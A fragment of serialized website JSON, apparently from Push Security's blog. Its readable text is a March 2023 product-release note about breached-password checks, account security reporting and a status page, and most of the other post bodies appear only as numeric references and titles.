list",[],{},{"nodeType":178,"data":301495,"content":301496},{},[301497,301501,301509,301513,301518,301522,301528],{"nodeType":173,"value":301498,"marks":301499,"data":301500},"Push now connects to the ",[],{},{"nodeType":186,"data":301502,"content":301504},{"uri":301503},"https://haveibeenpwned.com/",[301505],{"nodeType":173,"value":301506,"marks":301507,"data":301508},"Have I Been Pwned",[],{},{"nodeType":173,"value":301510,"marks":301511,"data":301512}," API to ",[],{},{"nodeType":173,"value":301514,"marks":301515,"data":301517},"check whether employee passwords match those exposed in data breaches",[301516],{"type":370},{},{"nodeType":173,"value":301519,"marks":301520,"data":301521},". If a match is found, Push can send a ChatOps message to the employee to ask them to change their password. Learn more about how it works in this ",[],{},{"nodeType":186,"data":301523,"content":301524},{"uri":111940},[301525],{"nodeType":173,"value":21642,"marks":301526,"data":301527},[],{},{"nodeType":173,"value":2340,"marks":301529,"data":301530},[],{},{"nodeType":178,"data":301532,"content":301533},{},[301534,301538,301543,301547,301554],{"nodeType":173,"value":301535,"marks":301536,"data":301537},"To further customize what counts as a weak password, you can also ",[],{},{"nodeType":173,"value":301539,"marks":301540,"data":301542},"configure a custom list of terms that Push will look for when completing password hygiene checks",[301541],{"type":370},{},{"nodeType":173,"value":301544,"marks":301545,"data":301546}," — such as company or team names, or other commonly used words at your organization that would be easy to guess. Learn more about creating a custom restricted words list in this ",[],{},{"nodeType":186,"data":301548,"content":301550},{"uri":301549},"https://pushsecurity.com/help/10067#start",[301551],{"nodeType":173,"value":21642,"marks":301552,"data":301553},[],{},{"nodeType":173,"value":1477,"marks":301555,"data":301556},[],{},{"nodeType":312,"data":301558,"content":301562},{"target":301559},{"sys":301560},{"id":301561,"type":317,"linkType":318},"69CBBeqe8csX49JSBPfMtn",[],{"nodeType":235,"data":301564,"content":301565},{},[301566],{"nodeType":173,"value":301567,"marks":301568,"data":301569},"Better at-a-glance reporting for employee account security",[],{},{"nodeType":178,"data":301571,"content":301572},{},[301573,301576,301581,301589],{"nodeType":173,"value":21634,"marks":301574,"data":301575},[],{},{"nodeType":173,"value":301577,"marks":301578,"data":301580},"new ",[301579],{"type":370},{},{"nodeType":186,"data":301582,"content":301583},{"uri":301457},[301584],{"nodeType":173,"value":301585,"marks":301586,"data":301588},"Account security page",[301587],{"type":370},{},{"nodeType":173,"value":301590,"marks":301591,"data":301592}," in the Push admin console to see an overview of MFA adoption and password security findings for your employees. The account security page combines the data previously available on the multi-factor authentication and password security pages in the admin console.",[],{},{"nodeType":178,"data":301594,"content":301595},{},[301596,301600,301605],{"nodeType":173,"value":301597,"marks":301598,"data":301599},"Click on an employee to see an improved presentation of Push’s security findings that puts account security issues into a ",[],{},{"nodeType":173,"value":301601,"marks":301602,"data":301604},"single efficient view",[301603],{"type":370},{},{"nodeType":173,"value":1477,"marks":301606,"data":301607},[],{},{"nodeType":312,"data":301609,"content":301613},{"target":301610},{"sys":301611},{"id":301612,"type":317,"linkType":318},"1cS37JXDDmIgrsqU0fMfZp",[],{"nodeType":235,"data":301615,"content":301616},{},[301617],{"nodeType":173,"value":301618,"marks":301619,"data":301620},"Keep up with Push on our status page",[],{},{"nodeType":178,"data":301622,"content":301623},{},[301624,301628,301636,301640,301645],{"nodeType":173,"value":301625,"marks":301626,"data":301627},"Learn about scheduled maintenance or other time-sensitive events on the Push platform by ",[],{},{"nodeType":186,"data":301629,"content":301631},{"uri":301630},"https://status.pushsecurity.com/",[301632],{"nodeType":173,"value":301633,"marks":301634,"data":301635},"subscribing to our status page",[],{},{"nodeType":173,"value":301637,"marks":301638,"data":301639},". You can choose to receive notifications via email or directly in Slack by clicking ",[],{},{"nodeType":173,"value":301641,"marks":301642,"data":301644},"Subscribe to updates",[301643],{"type":370},{},{"nodeType":173,"value":1477,"marks":301646,"data":301647},[],{},"Product Release: March 2023","Here’s what’s new on the Push platform for March 2023.","2023-03-22T00:00:00.000Z","product-release-march-2023",{"items":301653},[301654],{"sys":301655,"name":18399},{"id":18398},{"items":301657},[301658],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":301659},{"url":19129},{"items":301661},[301662],{"fullName":19125,"firstName":19126,"jobTitle":19127,"profilePicture":301663},{"url":19129},{"json":301665,"links":301879},{"nodeType":165,"data":301666,"content":301667},{},[301668,301675,301714,301720,301726,301731,301748,301754,301774,301779,301796,301802,301815,301828,301833,301850,301856,301862,301868,301873],{"nodeType":178,"data":301669,"content":301670},{},[301671],{"nodeType":173,"value":220348,"marks":301672,"data":301674},[301673],{"type":370},{},{"nodeType":250,"data":301676,"content":301677},{},[301678,301687,301696,301705],{"nodeType":254,"data":301679,"content":301680},{},[301681],{"nodeType":178,"data":301682,"content":301683},{},[301684],{"nodeType":173,"value":285028,"marks":301685,"data":301686},[],{},{"nodeType":254,"data":301688,"content":301689},{},[301690],{"nodeType":178,"data":301691,"content":301692},{},[301693],{"nodeType":173,"value":285038,"marks":301694,"data":301695},[],{},{"nodeType":254,"data":301697,"content":301698},{},[301699],{"nodeType":178,"data":301700,"content":301701},{},[301702],{"nodeType":173,"value":285048,"marks":301703,"data":301704},[],{},{"nodeType":254,"data":301706,"content":301707},{},[301708],{"nodeType":178,"data":301709,"content":301710},{},[301711],{"nodeType":173,"value":285058,"marks":301712,"data":301713},[],{},{"nodeType":235,"data":301715,"content":301716},{},[301717],{"nodeType":173,"value":285028,"marks":301718,"data":301719},[],{},{"nodeType":178,"data":301721,"content":301722},{},[301723],{"nodeType":173,"value":285071,"marks":301724,"data":301725},[],{},{"nodeType":312,"data":301727,"content":301730},{"target":301728},{"sys":301729},{"id":285078,"type":317,"linkType":318},[],{"nodeType":178,"data":301732,"content":301733},{},[301734,301737,301745],{"nodeType":173,"value":37,"marks":301735,"data":301736},[],{},{"nodeType":1698,"data":301738,"content":301741},{"target":301739},{"sys":301740},{"id":285090,"type":317,"linkType":318},[301742],{"nodeType":173,"value":148770,"marks":301743,"data":301744},[],{},{"nodeType":173,"value":37,"marks":301746,"data":301747},[],{},{"nodeType":235,"data":301749,"content":301750},{},[301751],{"nodeType":173,"value":285038,"marks":301752,"data":301753},[],{},{"nodeType":178,"data":301755,"content":301756},{},[301757,301760,301764,301767,301771],{"nodeType":173,"value":285108,"marks":301758,"data":301759},[],{},{"nodeType":173,"value":156829,"marks":301761,"data":301763},[301762],{"type":370},{},{"nodeType":173,"value":285116,"marks":301765,"data":301766},[],{},{"nodeType":173,"value":156821,"marks":301768,"data":301770},[301769],{"type":370},{},{"nodeType":173,"value":285124,"marks":301772,"data":301773},[],{},{"nodeType":312,"data":301775,"content":301778},{"target":301776},{"sys":301777},{"id":284258,"type":317,"linkType":318},[],{"nodeType":178,"data":301780,"content":301781},{},[301782,301785,301793],{"nodeType":173,"value":37,"marks":301783,"data":301784},[],{},{"nodeType":1698,"data":301786,"content":301789},{"target":301787},{"sys":301788},{"id":284271,"type":317,"linkType":318},[301790],{"nodeType":173,"value":148770,"marks":301791,"data":301792},[],{},{"nodeType":173,"value":37,"marks":301794,"data":301795},[],{},{"nodeType":235,"data":301797,"content":301798},{},[301799],{"nodeType":173,"value":285048,"marks":301800,"data":301801},[],{},{"nodeType":178,"data":301803,"content":301804},{},[301805,301808,301812],{"nodeType":173,"value":285159,"marks":301806,"data":301807},[],{},{"nodeType":173,"value":285163,"marks":301809,"data":301811},[301810],{"type":370},{},{"nodeType":173,"value":285168,"marks":301813,"data":301814},[],{},{"nodeType":178,"data":301816,"content":301817},{},[301818,301821,301825],{"nodeType":173,"value":285175,"marks":301819,"data":301820},[],{},{"nodeType":173,"value":285179,"marks":301822,"data":301824},[301823],{"type":370},{},{"nodeType":173,"value":285184,"marks":301826,"data":301827},[],{},{"nodeType":312,"data":301829,"content":301832},{"target":301830},{"sys":301831},{"id":285191,"type":317,"linkType":318},[],{"nodeType":178,"data":301834,"content":301835},{},[301836,301839,301847],{"nodeType":173,"value":37,"marks":301837,"data":301838},[],{},{"nodeType":1698,"data":301840,"content":301843},{"target":301841},{"sys":301842},{"id":285203,"type":317,"linkType":318},[301844],{"nodeType":173,"value":148770,"marks":301845,"data":301846},[],{},{"nodeType":173,"value":37,"marks":301848,"data":301849},[],{},{"nodeType":235,"data":301851,"content":301852},{},[301853],{"nodeType":173,"value":285215,"marks":301854,"data":301855},[],{},{"nodeType":178,"data":301857,"content":301858},{},[301859],{"nodeType":173,"value":285222,"marks":301860,"data":301861},[],{},{"nodeType":178,"data":301863,"content":301864},{},[301865],{"nodeType":173,"value":285229,"marks":301866,"data":301867},[],{},{"nodeType":312,"data":301869,"content":301872},{"target":301870},{"sys":301871},{"id":285236,"type":317,"linkType":318},[],{"nodeType":178,"data":301874,"content":301875},{},[301876],{"nodeType":173,"value":37,"marks":301877,"data":301878},[],{},{"entries":301880},{"inline":301881,"hyperlink":301882,"block":301895},[],[301883,301888,301890],{"sys":301884,"__typename":6655,"title":301885,"slug":301886,"articleId":301887},{"id":285090},"ChatOps topic guide: App discovery","chatops-topic-guide-saas-notifications",10059,{"sys":301889,"__typename":6655,"title":298873,"slug":298874,"articleId":298875},{"id":284271},{"sys":301891,"__typename":6655,"title":301892,"slug":301893,"articleId":301894},{"id":285203},"ChatOps topic guide: Security findings","chatops-topic-guide-security-findings",10093,[301896,301901,301904,301909],{"sys":301897,"__typename":5345,"title":301898,"caption":118,"layoutMode":118,"file":301899},{"id":285078},"New SaaS ChatOps gif - release notes - July 2023",{"url":301900,"width":273005,"height":298922},"https://images.ctfassets.net/y1cdw1ablpvd/6yLgKYpdXyFAKyZdSYDr9x/5dc78a007bfa29ae6a9fe86bdc680ba9/saas_discovery_topic_demo_small.gif",{"sys":301902,"__typename":5345,"title":298919,"caption":118,"layoutMode":118,"file":301903},{"id":284258},{"url":298921,"width":273005,"height":298922},{"sys":301905,"__typename":5345,"title":301906,"caption":118,"layoutMode":118,"file":301907},{"id":285191},"Security findings ChatOps gif - release notes - July 2023",{"url":301908,"width":273005,"height":298922},"https://images.ctfassets.net/y1cdw1ablpvd/357PUa97HGTzwsVHO8o5Zf/e67dc8f369eb07a192cef4db8aab05d9/security_findings_topic_demo.gif",{"sys":301910,"__typename":5345,"title":301911,"caption":118,"layoutMode":118,"file":301912},{"id":285236},"Unused integration ChatOps gif - release notes - July 2023",{"url":301913,"width":273005,"height":298922},"https://images.ctfassets.net/y1cdw1ablpvd/3Ccv1rnUc7zzjEx6DTTMA5/1c39bb37d3d94304780b188687d65058/unused_integration_chat_demo.gif","content:blog:product-release-july-2023.json","blog/product-release-july-2023.json","blog/product-release-july-2023",{"_path":301918,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":301919,"ogImage":118,"summary":301921,"title":209117,"subtitle":118,"metaTitle":301931,"synopsis":209118,"hashTags":118,"publishedDate":209119,"slug":209120,"tagsCollection":301932,"relatedBlogPostsCollection":301938,"authorsCollection":305797,"content":305801,"_id":306479,"_type":5439,"_source":5440,"_file":306480,"_stem":306481,"_extension":5439},"/blog/saas-attack-techniques",{"id":208338,"publishedAt":301920},"2025-04-28T18:14:11.572Z",{"json":301922},{"data":301923,"content":301924,"nodeType":165},{},[301925],{"data":301926,"content":301927,"nodeType":178},{},[301928],{"data":301929,"marks":301930,"value":209118,"nodeType":173},{},[],"SaaS attack techniques",{"items":301933},[301934,301936],{"sys":301935,"name":505},{"id":504},{"sys":301937,"name":509},{"id":508},{"items":301939},[301940,302711,303117],{"__typename":1528,"sys":301941,"content":301942,"title":268752,"synopsis":267888,"hashTags":118,"publishedDate":268753,"slug":268754,"tagsCollection":302701,"authorsCollection":302707},{"id":267879},{"json":301943},{"nodeType":165,"data":301944,"content":301945},{},[301946,301952,301958,301986,301992,301998,302014,302020,302026,302032,302056,302062,302068,302081,302087,302093,302123,302129,302135,302141,302147,302153,302158,302164,302170,302176,302183,302189,302205,302211,302217,302223,302229,302235,302241,302247,302253,302259,302264,302270,302286,302292,302308,302313,302318,302323,302329,302335,302341,302346,302351,302357,302363,302369,302375,302381,302386,302402,302418,302424,302429,302434,302440,302446,302452,302458,302479,302484,302489,302495,302501,302507,302517,302522,302528,302533,302538,302544,302550,302556,302561,302566,302572,302578,302683,302689,302695],{"nodeType":178,"data":301947,"content":301948},{},[301949],{"nodeType":173,"value":267888,"marks":301950,"data":301951},[],{},{"nodeType":178,"data":301953,"content":301954},{},[301955],{"nodeType":173,"value":267895,"marks":301956,"data":301957},[],{},{"nodeType":178,"data":301959,"content":301960},{},[301961,301964,301971,301974,301983],{"nodeType":173,"value":267902,"marks":301962,"data":301963},[],{},{"nodeType":186,"data":301965,"content":301966},{"uri":88239},[301967],{"nodeType":173,"value":88742,"marks":301968,"data":301970},[301969],{"type":194},{},{"nodeType":173,"value":267913,"marks":301972,"data":301973},[],{},{"nodeType":1698,"data":301975,"content":301978},{"target":301976},{"sys":301977},{"id":228244,"type":317,"linkType":318},[301979],{"nodeType":173,"value":252406,"marks":301980,"data":301982},[301981],{"type":194},{},{"nodeType":173,"value":197,"marks":301984,"data":301985},[],{},{"nodeType":178,"data":301987,"content":301988},{},[301989],{"nodeType":173,"value":267932,"marks":301990,"data":301991},[],{},{"nodeType":169,"data":301993,"content":301994},{},[301995],{"nodeType":173,"value":267939,"marks":301996,"data":301997},[],{},{"nodeType":178,"data":301999,"content":302000},{},[302001,302004,302011],{"nodeType":173,"value":15816,"marks":302002,"data":302003},[],{},{"nodeType":186,"data":302005,"content":302006},{"uri":144083},[302007],{"nodeType":173,"value":267952,"marks":302008,"data":302010},[302009],{"type":194},{},{"nodeType":173,"value":267957,"marks":302012,"data":302013},[],{},{"nodeType":178,"data":302015,"content":302016},{},[302017],{"nodeType":173,"value":267964,"marks":302018,"data":302019},[],{},{"nodeType":169,"data":302021,"content":302022},{},[302023],{"nodeType":173,"value":267971,"marks":302024,"data":302025},[],{},{"nodeType":178,"data":302027,"content":302028},{},[302029],{"nodeType":173,"value":267978,"marks":302030,"data":302031},[],{},{"nodeType":178,"data":302033,"content":302034},{},[302035,302038,302045,302048,302053],{"nodeType":173,"value":96646,"marks":302036,"data":302037},[],{},{"nodeType":186,"data":302039,"content":302040},{"uri":59335},[302041],{"nodeType":173,"value":208649,"marks":302042,"data":302044},[302043],{"type":194},{},{"nodeType":173,"value":267995,"marks":302046,"data":302047},[],{},{"nodeType":173,"value":267999,"marks":302049,"data":302052},[302050,302051],{"type":1646},{"type":370},{},{"nodeType":173,"value":268005,"marks":302054,"data":302055},[],{},{"nodeType":169,"data":302057,"content":302058},{},[302059],{"nodeType":173,"value":259540,"marks":302060,"data":302061},[],{},{"nodeType":178,"data":302063,"content":302064},{},[302065],{"nodeType":173,"value":268018,"marks":302066,"data":302067},[],{},{"nodeType":178,"data":302069,"content":302070},{},[302071,302074,302078],{"nodeType":173,"value":268025,"marks":302072,"data":302073},[],{},{"nodeType":173,"value":268029,"marks":302075,"data":302077},[302076],{"type":194},{},{"nodeType":173,"value":268034,"marks":302079,"data":302080},[],{},{"nodeType":178,"data":302082,"content":302083},{},[302084],{"nodeType":173,"value":268041,"marks":302085,"data":302086},[],{},{"nodeType":178,"data":302088,"content":302089},{},[302090],{"nodeType":173,"value":268048,"marks":302091,"data":302092},[],{},{"nodeType":246189,"data":302094,"content":302095},{},[302096,302105,302114],{"nodeType":254,"data":302097,"content":302098},{},[302099],{"nodeType":178,"data":302100,"content":302101},{},[302102],{"nodeType":173,"value":268061,"marks":302103,"data":302104},[],{},{"nodeType":254,"data":302106,"content":302107},{},[302108],{"nodeType":178,"data":302109,"content":302110},{},[302111],{"nodeType":173,"value":268071,"marks":302112,"data":302113},[],{},{"nodeType":254,"data":302115,"content":302116},{},[302117],{"nodeType":178,"data":302118,"content":302119},{},[302120],{"nodeType":173,"value":268081,"marks":302121,"data":302122},[],{},{"nodeType":235,"data":302124,"content":302125},{},[302126],{"nodeType":173,"value":268088,"marks":302127,"data":302128},[],{},{"nodeType":178,"data":302130,"content":302131},{},[302132],{"nodeType":173,"value":268095,"marks":302133,"data":302134},[],{},{"nodeType":178,"data":302136,"content":302137},{},[302138],{"nodeType":173,"value":268102,"marks":302139,"data":302140},[],{},{"nodeType":178,"data":302142,"content":302143},{},[302144],{"nodeType":173,"value":268109,"marks":302145,"data":302146},[],{},{"nodeType":178,"data":302148,"content":302149},{},[302150],{"nodeType":173,"value":268116,"marks":302151,"data":302152},[],{},{"nodeType":312,"data":302154,"content":302157},{"target":302155},{"sys":302156},{"id":268123,"type":317,"linkType":318},[],{"nodeType":235,"data":302159,"content":302160},{},[302161],{"nodeType":173,"value":268129,"marks":302162,"data":302163},[],{},{"nodeType":178,"data":302165,"content":302166},{},[302167],{"nodeType":173,"value":268136,"marks":302168,"data":302169},[],{},{"nodeType":178,"data":302171,"content":302172},{},[302173],{"nodeType":173,"value":268143,"marks":302174,"data":302175},[],{},{"nodeType":178,"data":302177,"content":302178},{},[302179],{"nodeType":173,"value":268150,"marks":302180,"data":302182},[302181],{"type":370},{},{"nodeType":235,"data":302184,"content":302185},{},[302186],{"nodeType":173,"value":268158,"marks":302187,"data":302188},[],{},{"nodeType":178,"data":302190,"content":302191},{},[302192,302195,302202],{"nodeType":173,"value":268165,"marks":302193,"data":302194},[],{},{"nodeType":186,"data":302196,"content":302197},{"uri":268170},[302198],{"nodeType":173,"value":268173,"marks":302199,"data":302201},[302200],{"type":194},{},{"nodeType":173,"value":268178,"marks":302203,"data":302204},[],{},{"nodeType":178,"data":302206,"content":302207},{},[302208],{"nodeType":173,"value":268185,"marks":302209,"data":302210},[],{},{"nodeType":178,"data":302212,"content":302213},{},[302214],{"nodeType":173,"value":268192,"marks":302215,"data":302216},[],{},{"nodeType":169,"data":302218,"content":302219},{},[302220],{"nodeType":173,"value":268199,"marks":302221,"data":302222},[],{},{"nodeType":178,"data":302224,"content":302225},{},[302226],{"nodeType":173,"value":268206,"marks":302227,"data":302228},[],{},{"nodeType":178,"data":302230,"content":302231},{},[302232],{"nodeType":173,"value":268213,"marks":302233,"data":302234},[],{},{"nodeType":178,"data":302236,"content":302237},{},[302238],{"nodeType":173,"value":268220,"marks":302239,"data":302240},[],{},{"nodeType":178,"data":302242,"content":302243},{},[302244],{"nodeType":173,"value":268227,"marks":302245,"data":302246},[],{},{"nodeType":178,"data":302248,"content":302249},{},[302250],{"nodeType":173,"value":268234,"marks":302251,"data":302252},[],{},{"nodeType":178,"data":302254,"content":302255},{},[302256],{"nodeType":173,"value":268241,"marks":302257,"data":302258},[],{},{"nodeType":312,"data":302260,"content":302263},{"target":302261},{"sys":302262},{"id":268248,"type":317,"linkType":318},[],{"nodeType":169,"data":302265,"content":302266},{},[302267],{"nodeType":173,"value":268254,"marks":302268,"data":302269},[],{},{"nodeType":178,"data":302271,"content":302272},{},[302273,302276,302283],{"nodeType":173,"value":268261,"marks":302274,"data":302275},[],{},{"nodeType":186,"data":302277,"content":302278},{"uri":197841},[302279],{"nodeType":173,"value":268268,"marks":302280,"data":302282},[302281],{"type":194},{},{"nodeType":173,"value":268273,"marks":302284,"data":302285},[],{},{"nodeType":235,"data":302287,"content":302288},{},[302289],{"nodeType":173,"value":268280,"marks":302290,"data":302291},[],{},{"nodeType":178,"data":302293,"content":302294},{},[302295,302298,302305],{"nodeType":173,"value":268287,"marks":302296,"data":302297},[],{},{"nodeType":186,"data":302299,"content":302300},{"uri":268292},[302301],{"nodeType":173,"value":268292,"marks":302302,"data":302304},[302303],{"type":194},{},{"nodeType":173,"value":268299,"marks":302306,"data":302307},[],{},{"nodeType":312,"data":302309,"content":302312},{"target":302310},{"sys":302311},{"id":268306,"type":317,"linkType":318},[],{"nodeType":312,"data":302314,"content":302317},{"target":302315},{"sys":302316},{"id":268312,"type":317,"linkType":318},[],{"nodeType":312,"data":302319,"content":302322},{"target":302320},{"sys":302321},{"id":268318,"type":317,"linkType":318},[],{"nodeType":235,"data":302324,"content":302325},{},[302326],{"nodeType":173,"value":268324,"marks":302327,"data":302328},[],{},{"nodeType":178,"data":302330,"content":302331},{},[302332],{"nodeType":173,"value":268331,"marks":302333,"data":302334},[],{},{"nodeType":178,"data":302336,"content":302337},{},[302338],{"nodeType":173,"value":268338,"marks":302339,"data":302340},[],{},{"nodeType":312,"data":302342,"content":302345},{"target":302343},{"sys":302344},{"id":268345,"type":317,"linkType":318},[],{"nodeType":312,"data":302347,"content":302350},{"target":302348},{"sys":302349},{"id":268351,"type":317,"linkType":318},[],{"nodeType":169,"data":302352,"content":302353},{},[302354],{"nodeType":173,"value":268357,"marks":302355,"data":302356},[],{},{"nodeType":178,"data":302358,"content":302359},{},[302360],{"nodeType":173,"value":268364,"marks":302361,"data":302362},[],{},{"nodeType":178,"data":302364,"content":302365},{},[302366],{"nodeType":173,"value":268371,"marks":302367,"data":302368},[],{},{"nodeType":235,"data":302370,"content":302371},{},[302372],{"nodeType":173,"value":268378,"marks":302373,"data":302374},[],{},{"nodeType":178,"data":302376,"content":302377},{},[302378],{"nodeType":173,"value":268385,"marks":302379,"data":302380},[],{},{"nodeType":312,"data":302382,"content":302385},{"target":302383},{"sys":302384},{"id":268392,"type":317,"linkType":318},[],{"nodeType":178,"data":302387,"content":302388},{},[302389,302392,302399],{"nodeType":173,"value":268398,"marks":302390,"data":302391},[],{},{"nodeType":186,"data":302393,"content":302394},{"uri":259860},[302395],{"nodeType":173,"value":259866,"marks":302396,"data":302398},[302397],{"type":194},{},{"nodeType":173,"value":268409,"marks":302400,"data":302401},[],{},{"nodeType":178,"data":302403,"content":302404},{},[302405,302408,302415],{"nodeType":173,"value":268416,"marks":302406,"data":302407},[],{},{"nodeType":186,"data":302409,"content":302410},{"uri":197917},[302411],{"nodeType":173,"value":268423,"marks":302412,"data":302414},[302413],{"type":194},{},{"nodeType":173,"value":268428,"marks":302416,"data":302417},[],{},{"nodeType":178,"data":302419,"content":302420},{},[302421],{"nodeType":173,"value":268435,"marks":302422,"data":302423},[],{},{"nodeType":312,"data":302425,"content":302428},{"target":302426},{"sys":302427},{"id":268442,"type":317,"linkType":318},[],{"nodeType":312,"data":302430,"content":302433},{"target":302431},{"sys":302432},{"id":268448,"type":317,"linkType":318},[],{"nodeType":178,"data":302435,"content":302436},{},[302437],{"nodeType":173,"value":268454,"marks":302438,"data":302439},[],{},{"nodeType":235,"data":302441,"content":302442},{},[302443],{"nodeType":173,"value":268461,"marks":302444,"data":302445},[],{},{"nodeType":178,"data":302447,"content":302448},{},[302449],{"nodeType":173,"value":268468,"marks":302450,"data":302451},[],{},{"nodeType":178,"data":302453,"content":302454},{},[302455],{"nodeType":173,"value":268475,"marks":302456,"data":302457},[],{},{"nodeType":250,"data":302459,"content":302460},{},[302461,302470],{"nodeType":254,"data":302462,"content":302463},{},[302464],{"nodeType":178,"data":302465,"content":302466},{},[302467],{"nodeType":173,"value":268488,"marks":302468,"data":302469},[],{},{"nodeType":254,"data":302471,"content":302472},{},[302473],{"nodeType":178,"data":302474,"content":302475},{},[302476],{"nodeType":173,"value":268498,"marks":302477,"data":302478},[],{},{"nodeType":312,"data":302480,"content":302483},{"target":302481},{"sys":302482},{"id":268505,"type":317,"linkType":318},[],{"nodeType":312,"data":302485,"content":302488},{"target":302486},{"sys":302487},{"id":268511,"type":317,"linkType":318},[],{"nodeType":178,"data":302490,"content":302491},{},[302492],{"nodeType":173,"value":268517,"marks":302493,"data":302494},[],{},{"nodeType":178,"data":302496,"content":302497},{},[302498],{"nodeType":173,"value":268524,"marks":302499,"data":302500},[],{},{"nodeType":178,"data":302502,"content":302503},{},[302504],{"nodeType":173,"value":268531,"marks":302505,"data":302506},[],{},{"nodeType":178,"data":302508,"content":302509},{},[302510,302513],{"nodeType":173,"value":268538,"marks":302511,"data":302512},[],{},{"nodeType":173,"value":10557,"marks":302514,"data":302516},[302515],{"type":1646},{},{"nodeType":312,"data":302518,"content":302521},{"target":302519},{"sys":302520},{"id":268549,"type":317,"linkType":318},[],{"nodeType":178,"data":302523,"content":302524},{},[302525],{"nodeType":173,"value":268555,"marks":302526,"data":302527},[],{},{"nodeType":312,"data":302529,"content":302532},{"target":302530},{"sys":302531},{"id":268562,"type":317,"linkType":318},[],{"nodeType":312,"data":302534,"content":302537},{"target":302535},{"sys":302536},{"id":268568,"type":317,"linkType":318},[],{"nodeType":178,"data":302539,"content":302540},{},[302541],{"nodeType":173,"value":268574,"marks":302542,"data":302543},[],{},{"nodeType":169,"data":302545,"content":302546},{},[302547],{"nodeType":173,"value":268581,"marks":302548,"data":302549},[],{},{"nodeType":178,"data":302551,"content":302552},{},[302553],{"nodeType":173,"value":268588,"marks":302554,"data":302555},[],{},{"nodeType":312,"data":302557,"content":302560},{"target":302558},{"sys":302559},{"id":268595,"type":317,"linkType":318},[],{"nodeType":312,"data":302562,"content":302565},{"target":302563},{"sys":302564},{"id":268601,"type":317,"linkType":318},[],{"nodeType":169,"data":302567,"content":302568},{},[302569],{"nodeType":173,"value":15539,"marks":302570,"data":302571},[],{},{"nodeType":178,"data":302573,"content":302574},{},[302575],{"nodeType":173,"value":268613,"marks":302576,"data":302577},[],{},{"nodeType":250,"data":302579,"content":302580},{},[302581,302590,302599,302608,302617,302665,302674],{"nodeType":254,"data":302582,"content":302583},{},[302584],{"nodeType":178,"data":302585,"content":302586},{},[302587],{"nodeType":173,"value":268626,"marks":302588,"data":302589},[],{},{"nodeType":254,"data":302591,"content":302592},{},[302593],{"nodeType":178,"data":302594,"content":302595},{},[302596],{"nodeType":173,"value":268636,"marks":302597,"data":302598},[],{},{"nodeType":254,"data":302600,"content":302601},{},[302602],{"nodeType":178,"data":302603,"content":302604},{},[302605],{"nodeType":173,"value":268646,"marks":302606,"data":302607},[],{},{"nodeType":254,"data":302609,"content":302610},{},[302611],{"nodeType":178,"data":302612,"content":302613},{},[302614],{"nodeType":173,"value":268656,"marks":302615,"data":302616},[],{},{"nodeType":254,"data":302618,"content":302619},{},[302620,302626],{"nodeType":178,"data":302621,"content":302622},{},[302623],{"nodeType":173,"value":268666,"marks":302624,"data":302625},[],{},{"nodeType":250,"data":302627,"content":302628},{},[302629,302638,302647,302656],{"nodeType":254,"data":302630,"content":302631},{},[302632],{"nodeType":178,"data":302633,"content":302634},{},[302635],{"nodeType":173,"value":268679,"marks":302636,"data":302637},[],{},{"nodeType":254,"data":302639,"content":302640},{},[302641],{"nodeType":178,"data":302642,"content":302643},{},[302644],{"nodeType":173,"value":268689,"marks":302645,"data":302646},[],{},{"nodeType":254,"data":302648,"content":302649},{},[302650],{"nodeType":178,"data":302651,"content":302652},{},[302653],{"nodeType":173,"value":268699,"marks":302654,"data":302655},[],{},{"nodeType":254,"data":302657,"content":302658},{},[302659],{"nodeType":178,"data":302660,"content":302661},{},[302662],{"nodeType":173,"value":268709,"marks":302663,"data":302664},[],{},{"nodeType":254,"data":302666,"content":302667},{},[302668],{"nodeType":178,"data":302669,"content":302670},{},[302671],{"nodeType":173,"value":268719,"marks":302672,"data":302673},[],{},{"nodeType":254,"data":302675,"content":302676},{},[302677],{"nodeType":178,"data":302678,"content":302679},{},[302680],{"nodeType":173,"value":268729,"marks":302681,"data":302682},[],{},{"nodeType":169,"data":302684,"content":302685},{},[302686],{"nodeType":173,"value":40632,"marks":302687,"data":302688},[],{},{"nodeType":178,"data":302690,"content":302691},{},[302692],{"nodeType":173,"value":268742,"marks":302693,"data":302694},[],{},{"nodeType":178,"data":302696,"content":302697},{},[302698],{"nodeType":173,"value":268749,"marks":302699,"data":302700},[],{},{"items":302702},[302703,302705],{"sys":302704,"name":505},{"id":504},{"sys":302706,"name":509},{"id":508},{"items":302708},[302709],{"fullName":8611,"firstName":8612,"jobTitle":8613,"profilePicture":302710},{"url":8615},{"__typename":1528,"sys":302712,"content":302713,"title":252406,"synopsis":259904,"hashTags":118,"publishedDate":259905,"slug":252407,"tagsCollection":303107,"authorsCollection":303113},{"id":228244},{"json":302714},{"data":302715,"content":302716,"nodeType":165},{},[302717,302733,302739,302745,302751,302767,302773,302789,302795,302801,302807,302813,302819,302825,302831,302847,302853,302859,302864,302870,302876,302882,302887,302892,302897,302903,302909,302914,302920,302926,302932,302937,302943,302949,302955,302961,302967,302972,302978,302984,302989,302995,303001,303006,303012,303018,303077,303083,303089,303095,303101],{"data":302718,"content":302719,"nodeType":178},{},[302720,302723,302730],{"data":302721,"marks":302722,"value":259462,"nodeType":173},{},[],{"data":302724,"content":302725,"nodeType":186},{"uri":88239},[302726],{"data":302727,"marks":302728,"value":88742,"nodeType":173},{},[302729],{"type":194},{"data":302731,"marks":302732,"value":259473,"nodeType":173},{},[],{"data":302734,"content":302735,"nodeType":178},{},[302736],{"data":302737,"marks":302738,"value":259480,"nodeType":173},{},[],{"data":302740,"content":302741,"nodeType":178},{},[302742],{"data":302743,"marks":302744,"value":259487,"nodeType":173},{},[],{"data":302746,"content":302747,"nodeType":169},{},[302748],{"data":302749,"marks":302750,"value":227960,"nodeType":173},{},[],{"data":302752,"content":302753,"nodeType":178},{},[302754,302757,302764],{"data":302755,"marks":302756,"value":37,"nodeType":173},{},[],{"data":302758,"content":302759,"nodeType":186},{"uri":208521},[302760],{"data":302761,"marks":302762,"value":227973,"nodeType":173},{},[302763],{"type":194},{"data":302765,"marks":302766,"value":227977,"nodeType":173},{},[],{"data":302768,"content":302769,"nodeType":169},{},[302770],{"data":302771,"marks":302772,"value":259516,"nodeType":173},{},[],{"data":302774,"content":302775,"nodeType":178},{},[302776,302779,302786],{"data":302777,"marks":302778,"value":37,"nodeType":173},{},[],{"data":302780,"content":302781,"nodeType":186},{"uri":63250},[302782],{"data":302783,"marks":302784,"value":63256,"nodeType":173},{},[302785],{"type":194},{"data":302787,"marks":302788,"value":259533,"nodeType":173},{},[],{"data":302790,"content":302791,"nodeType":169},{},[302792],{"data":302793,"marks":302794,"value":259540,"nodeType":173},{},[],{"data":302796,"co